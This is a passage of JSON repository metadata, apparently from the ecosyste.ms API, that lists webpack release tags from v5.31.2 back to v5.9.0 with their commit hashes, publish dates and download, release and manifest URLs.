y_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/